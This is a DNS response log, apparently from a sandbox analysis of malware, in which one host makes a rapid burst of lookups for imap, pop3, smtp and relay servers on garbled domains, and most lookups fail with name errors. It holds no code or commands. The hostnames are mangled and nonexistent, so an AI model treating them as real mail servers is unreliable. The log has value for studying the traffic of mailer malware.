Nov 30, 2023 11:22:44.272506952 CET	1.1.1.1	192.168.2.4	0x3339	Name error (3)	imap.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.273319006 CET	1.1.1.1	192.168.2.4	0xeb2d	Name error (3)	smtp.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.273338079 CET	1.1.1.1	192.168.2.4	0xa335	Name error (3)	imap.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.274096966 CET	1.1.1.1	192.168.2.4	0xfeab	Name error (3)	imap.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.274841070 CET	1.1.1.1	192.168.2.4	0x4652	Name error (3)	mail.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.275259972 CET	1.1.1.1	192.168.2.4	0xeccc	Name error (3)	mail.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.275645971 CET	1.1.1.1	192.168.2.4	0x4d46	Name error (3)	pop3.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.289589882 CET	1.1.1.1	192.168.2.4	0x1372	Name error (3)	relay.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.294405937 CET	1.1.1.1	192.168.2.4	0xa712	Name error (3)	mail.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.295083046 CET	1.1.1.1	192.168.2.4	0x9317	Name error (3)	pop3.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.296541929 CET	1.1.1.1	192.168.2.4	0xa3c9	Name error (3)	imap.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.308171034 CET	1.1.1.1	192.168.2.4	0xea60	Name error (3)	imap.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.337425947 CET	1.1.1.1	192.168.2.4	0x4766	Name error (3)	pop.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.337440968 CET	1.1.1.1	192.168.2.4	0x4766	Name error (3)	pop.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.342940092 CET	1.1.1.1	192.168.2.4	0x42f0	Name error (3)	imap.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.343938112 CET	1.1.1.1	192.168.2.4	0x37e7	Name error (3)	imap.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.345273972 CET	1.1.1.1	192.168.2.4	0xd7fd	Name error (3)	imap.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.345457077 CET	1.1.1.1	192.168.2.4	0x71e3	Name error (3)	mail.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.347105026 CET	1.1.1.1	192.168.2.4	0x5f48	Name error (3)	pop3.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.352969885 CET	1.1.1.1	192.168.2.4	0x85e6	Name error (3)	getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.354639053 CET	1.1.1.1	192.168.2.4	0xe706	Name error (3)	mail.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.363130093 CET	1.1.1.1	192.168.2.4	0x6b75	Name error (3)	mail.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.390623093 CET	1.1.1.1	192.168.2.4	0x862f	Name error (3)	imap.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.391957045 CET	1.1.1.1	192.168.2.4	0xae4f	Name error (3)	imap.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.396647930 CET	1.1.1.1	192.168.2.4	0x801f	Name error (3)	mail.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.397517920 CET	1.1.1.1	192.168.2.4	0xd690	Name error (3)	imap.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.397751093 CET	1.1.1.1	192.168.2.4	0x4b45	Name error (3)	pop3.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.401772022 CET	1.1.1.1	192.168.2.4	0xa1f8	Name error (3)	imap.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.408626080 CET	1.1.1.1	192.168.2.4	0xc0dd	Name error (3)	mail.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.410978079 CET	1.1.1.1	192.168.2.4	0x56a4	Name error (3)	imap.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.427409887 CET	1.1.1.1	192.168.2.4	0xef0d	Name error (3)	imap.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.440274000 CET	1.1.1.1	192.168.2.4	0x2222	Name error (3)	mailgate.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.441026926 CET	1.1.1.1	192.168.2.4	0x8038	Name error (3)	imap.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.443162918 CET	1.1.1.1	192.168.2.4	0xbbaa	Name error (3)	imap.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.475425005 CET	1.1.1.1	192.168.2.4	0xce25	Name error (3)	imap.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.475461006 CET	1.1.1.1	192.168.2.4	0xce25	Name error (3)	imap.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.486129999 CET	1.1.1.1	192.168.2.4	0x8038	Name error (3)	imap.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.487334013 CET	1.1.1.1	192.168.2.4	0x6b75	Name error (3)	mail.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.488341093 CET	1.1.1.1	192.168.2.4	0x4a8b	Name error (3)	pop3.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.491306067 CET	1.1.1.1	192.168.2.4	0x7206	Name error (3)	mail.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.491705894 CET	1.1.1.1	192.168.2.4	0x362c	Name error (3)	pop3.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.492557049 CET	1.1.1.1	192.168.2.4	0x2611	Name error (3)	imap.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.492619991 CET	1.1.1.1	192.168.2.4	0xd3e5	Name error (3)	pop3.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.493072033 CET	1.1.1.1	192.168.2.4	0x7cba	Name error (3)	imap.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.493995905 CET	1.1.1.1	192.168.2.4	0xd894	Name error (3)	imap.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.494950056 CET	1.1.1.1	192.168.2.4	0x3ea2	Name error (3)	pop3.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.499982119 CET	1.1.1.1	192.168.2.4	0xd007	Name error (3)	mail.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.502290010 CET	1.1.1.1	192.168.2.4	0x2eec	Name error (3)	mail.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.502357960 CET	1.1.1.1	192.168.2.4	0x2f70	Name error (3)	mailgate.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.504209042 CET	1.1.1.1	192.168.2.4	0xb1c1	Name error (3)	imap.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.504597902 CET	1.1.1.1	192.168.2.4	0x9372	Name error (3)	mail.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.505630970 CET	1.1.1.1	192.168.2.4	0xd314	Name error (3)	imap.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.505772114 CET	1.1.1.1	192.168.2.4	0xc04c	Name error (3)	imap.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.505805016 CET	1.1.1.1	192.168.2.4	0x29e1	Name error (3)	pop3.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.508287907 CET	1.1.1.1	192.168.2.4	0xa3d2	Name error (3)	mailgate.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.508913994 CET	1.1.1.1	192.168.2.4	0xe2ed	Name error (3)	imap.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.509048939 CET	1.1.1.1	192.168.2.4	0x3f83	Name error (3)	pop3.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.509099007 CET	1.1.1.1	192.168.2.4	0x23da	Name error (3)	pop3.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.509898901 CET	1.1.1.1	192.168.2.4	0xc9f6	Name error (3)	imap.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.510042906 CET	1.1.1.1	192.168.2.4	0xbce	Name error (3)	mailgate.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.512816906 CET	1.1.1.1	192.168.2.4	0x36d5	Name error (3)	pop3.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.514624119 CET	1.1.1.1	192.168.2.4	0x5efc	Name error (3)	pop3.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.514978886 CET	1.1.1.1	192.168.2.4	0xff12	Name error (3)	pop3.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.516031981 CET	1.1.1.1	192.168.2.4	0xad48	Name error (3)	pop3.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.516983032 CET	1.1.1.1	192.168.2.4	0x5f71	Name error (3)	pop3.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.518623114 CET	1.1.1.1	192.168.2.4	0xf723	Name error (3)	imap.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.519182920 CET	1.1.1.1	192.168.2.4	0xa86	Name error (3)	imap.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.520733118 CET	1.1.1.1	192.168.2.4	0x2984	Name error (3)	pop3.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.521560907 CET	1.1.1.1	192.168.2.4	0xead1	Name error (3)	pop3.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.521718979 CET	1.1.1.1	192.168.2.4	0x618	Name error (3)	mailgate.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.522262096 CET	1.1.1.1	192.168.2.4	0x6c7e	Name error (3)	relay.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.522584915 CET	1.1.1.1	192.168.2.4	0x91b2	Name error (3)	pop3.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.523180962 CET	1.1.1.1	192.168.2.4	0x721	Name error (3)	mail.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.524507046 CET	1.1.1.1	192.168.2.4	0x35f3	Name error (3)	mailgate.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.524542093 CET	1.1.1.1	192.168.2.4	0x39cf	Name error (3)	imap.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.526540041 CET	1.1.1.1	192.168.2.4	0xc520	Name error (3)	mail.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.554955006 CET	1.1.1.1	192.168.2.4	0xa9f5	Name error (3)	imap.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.556217909 CET	1.1.1.1	192.168.2.4	0x1b20	Name error (3)	mail.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.565220118 CET	1.1.1.1	192.168.2.4	0x5332	Name error (3)	imap.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.565298080 CET	1.1.1.1	192.168.2.4	0xf7ee	Name error (3)	imap.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.565402031 CET	1.1.1.1	192.168.2.4	0x6ea0	Name error (3)	mail.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.571568012 CET	1.1.1.1	192.168.2.4	0xd153	Name error (3)	pop3.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.580791950 CET	1.1.1.1	192.168.2.4	0x8f30	Name error (3)	pop3.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.583858013 CET	1.1.1.1	192.168.2.4	0x992c	Name error (3)	pop3.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.593705893 CET	1.1.1.1	192.168.2.4	0x987a	Name error (3)	imap.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.599041939 CET	1.1.1.1	192.168.2.4	0x2689	Name error (3)	pop3.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.600198030 CET	1.1.1.1	192.168.2.4	0xb995	Name error (3)	pop3.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.601316929 CET	1.1.1.1	192.168.2.4	0xc44c	Name error (3)	mail.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.605133057 CET	1.1.1.1	192.168.2.4	0x9b90	Name error (3)	pop3.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.631102085 CET	1.1.1.1	192.168.2.4	0xa4b8	Name error (3)	mailgate.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.633904934 CET	1.1.1.1	192.168.2.4	0xa140	Name error (3)	pop3.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.650388002 CET	1.1.1.1	192.168.2.4	0xac46	Name error (3)	imap.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.650409937 CET	1.1.1.1	192.168.2.4	0xac46	Name error (3)	imap.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.653618097 CET	1.1.1.1	192.168.2.4	0x54ec	Name error (3)	tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.664530039 CET	1.1.1.1	192.168.2.4	0x6573	Name error (3)	pop3.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.677597046 CET	1.1.1.1	192.168.2.4	0xea28	Name error (3)	imap.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.677613974 CET	1.1.1.1	192.168.2.4	0x822	Name error (3)	smtp.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.678668022 CET	1.1.1.1	192.168.2.4	0x966c	Name error (3)	pop3.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.678946972 CET	1.1.1.1	192.168.2.4	0x3af1	Name error (3)	mailgate.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.681420088 CET	1.1.1.1	192.168.2.4	0x2534	Name error (3)	pop3.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.692595005 CET	1.1.1.1	192.168.2.4	0xf2c3	Name error (3)	pop3.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.700232983 CET	1.1.1.1	192.168.2.4	0x4c64	Name error (3)	imap.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.741282940 CET	1.1.1.1	192.168.2.4	0x748	Name error (3)	imap.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.741722107 CET	1.1.1.1	192.168.2.4	0x2c90	Name error (3)	pop3.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.744227886 CET	1.1.1.1	192.168.2.4	0x4bd4	Name error (3)	mailgate.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.746396065 CET	1.1.1.1	192.168.2.4	0x6d1d	Name error (3)	mail.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.747792006 CET	1.1.1.1	192.168.2.4	0x6129	Name error (3)	pop3.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.749847889 CET	1.1.1.1	192.168.2.4	0x806	Name error (3)	imap.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.750685930 CET	1.1.1.1	192.168.2.4	0x7405	Name error (3)	pop3.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.752250910 CET	1.1.1.1	192.168.2.4	0x86bd	Name error (3)	imap.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.753627062 CET	1.1.1.1	192.168.2.4	0x21d3	Name error (3)	pop3.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.754797935 CET	1.1.1.1	192.168.2.4	0x20e1	Name error (3)	pop3.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.758227110 CET	1.1.1.1	192.168.2.4	0xf1e	Name error (3)	smtp.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.758718967 CET	1.1.1.1	192.168.2.4	0xaa51	Name error (3)	relay.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.761075974 CET	1.1.1.1	192.168.2.4	0x9fa4	Name error (3)	imap.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.761405945 CET	1.1.1.1	192.168.2.4	0x3eeb	Name error (3)	pop3.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.761601925 CET	1.1.1.1	192.168.2.4	0x3b63	Name error (3)	mail.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.763567924 CET	1.1.1.1	192.168.2.4	0xab2a	Name error (3)	imap.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.764121056 CET	1.1.1.1	192.168.2.4	0x70ea	Name error (3)	imap.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.764600039 CET	1.1.1.1	192.168.2.4	0x312c	Name error (3)	pop3.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.787075043 CET	1.1.1.1	192.168.2.4	0xe1b4	Name error (3)	pop3.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.799000025 CET	1.1.1.1	192.168.2.4	0x5cbe	Name error (3)	pop3.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.800628901 CET	1.1.1.1	192.168.2.4	0xa686	Name error (3)	mail.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.802119017 CET	1.1.1.1	192.168.2.4	0x4c64	Name error (3)	imap.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.802742958 CET	1.1.1.1	192.168.2.4	0xb6f4	Server failure (2)	pop3.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.802758932 CET	1.1.1.1	192.168.2.4	0xa140	Name error (3)	pop3.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.803667068 CET	1.1.1.1	192.168.2.4	0x6de7	Name error (3)	mail.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.803782940 CET	1.1.1.1	192.168.2.4	0x2c90	Name error (3)	pop3.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.805309057 CET	1.1.1.1	192.168.2.4	0x1e98	Name error (3)	mailgate.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.806000948 CET	1.1.1.1	192.168.2.4	0xcdf1	Name error (3)	imap.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.810811043 CET	1.1.1.1	192.168.2.4	0x8783	Name error (3)	mail.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.811580896 CET	1.1.1.1	192.168.2.4	0x8771	Name error (3)	pop3.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.812084913 CET	1.1.1.1	192.168.2.4	0x1e4b	Name error (3)	imap.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.813066006 CET	1.1.1.1	192.168.2.4	0xf313	Name error (3)	pop3.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.813366890 CET	1.1.1.1	192.168.2.4	0xe5f1	Name error (3)	relay.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.821048975 CET	1.1.1.1	192.168.2.4	0x4502	Name error (3)	imap.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.833184958 CET	1.1.1.1	192.168.2.4	0x247b	Name error (3)	imap.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.843511105 CET	1.1.1.1	192.168.2.4	0xf942	Name error (3)	mailgate.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.843611002 CET	1.1.1.1	192.168.2.4	0xa8e1	Name error (3)	pop3.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.845007896 CET	1.1.1.1	192.168.2.4	0xa1ee	Name error (3)	imap.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.846899986 CET	1.1.1.1	192.168.2.4	0x612e	Name error (3)	pop3.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.847296000 CET	1.1.1.1	192.168.2.4	0x16fc	Name error (3)	mailgate.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.848803997 CET	1.1.1.1	192.168.2.4	0xe1b4	Name error (3)	pop3.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.852720976 CET	1.1.1.1	192.168.2.4	0x483f	Name error (3)	imap.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.852741957 CET	1.1.1.1	192.168.2.4	0x1ff0	Name error (3)	relay.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.853118896 CET	1.1.1.1	192.168.2.4	0x71c2	Name error (3)	imap.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.860879898 CET	1.1.1.1	192.168.2.4	0x2b44	Name error (3)	pop3.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.866106987 CET	1.1.1.1	192.168.2.4	0xb6f4	Server failure (2)	pop3.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.868319035 CET	1.1.1.1	192.168.2.4	0xb57f	Name error (3)	pop3.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.871457100 CET	1.1.1.1	192.168.2.4	0xeac8	Name error (3)	pop3.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.871786118 CET	1.1.1.1	192.168.2.4	0xbb4b	Name error (3)	imap.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.887449980 CET	1.1.1.1	192.168.2.4	0xbf5f	Name error (3)	pop3.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.909835100 CET	1.1.1.1	192.168.2.4	0xa686	Name error (3)	mail.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.912277937 CET	1.1.1.1	192.168.2.4	0x9c54	Name error (3)	imap.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.912303925 CET	1.1.1.1	192.168.2.4	0x9c54	Name error (3)	imap.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.926796913 CET	1.1.1.1	192.168.2.4	0x6be9	Name error (3)	imap.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.926829100 CET	1.1.1.1	192.168.2.4	0x6be9	Name error (3)	imap.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.955317974 CET	1.1.1.1	192.168.2.4	0x89b8	Name error (3)	pop3.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.988198996 CET	1.1.1.1	192.168.2.4	0x2b44	Name error (3)	pop3.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.988236904 CET	1.1.1.1	192.168.2.4	0xbf5f	Name error (3)	pop3.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.011950016 CET	1.1.1.1	192.168.2.4	0xdfb4	Name error (3)	pop3.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.021178961 CET	1.1.1.1	192.168.2.4	0xa0ee	Name error (3)	pop3.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.021362066 CET	1.1.1.1	192.168.2.4	0x936	Name error (3)	mailgate.yahpl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.037586927 CET	1.1.1.1	192.168.2.4	0x8a33	Name error (3)	imap.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.046724081 CET	1.1.1.1	192.168.2.4	0x7065	Name error (3)	mailgate.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.047120094 CET	1.1.1.1	192.168.2.4	0xc228	Name error (3)	pop3.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.049060106 CET	1.1.1.1	192.168.2.4	0xddd1	Name error (3)	relay.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.058242083 CET	1.1.1.1	192.168.2.4	0x588c	Name error (3)	pop3.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.078728914 CET	1.1.1.1	192.168.2.4	0xa0ee	Name error (3)	pop3.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.116022110 CET	1.1.1.1	192.168.2.4	0xa845	Name error (3)	relay.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.131045103 CET	1.1.1.1	192.168.2.4	0x50e1	Name error (3)	pop3.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.192713022 CET	1.1.1.1	192.168.2.4	0x20ab	Name error (3)	mail.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
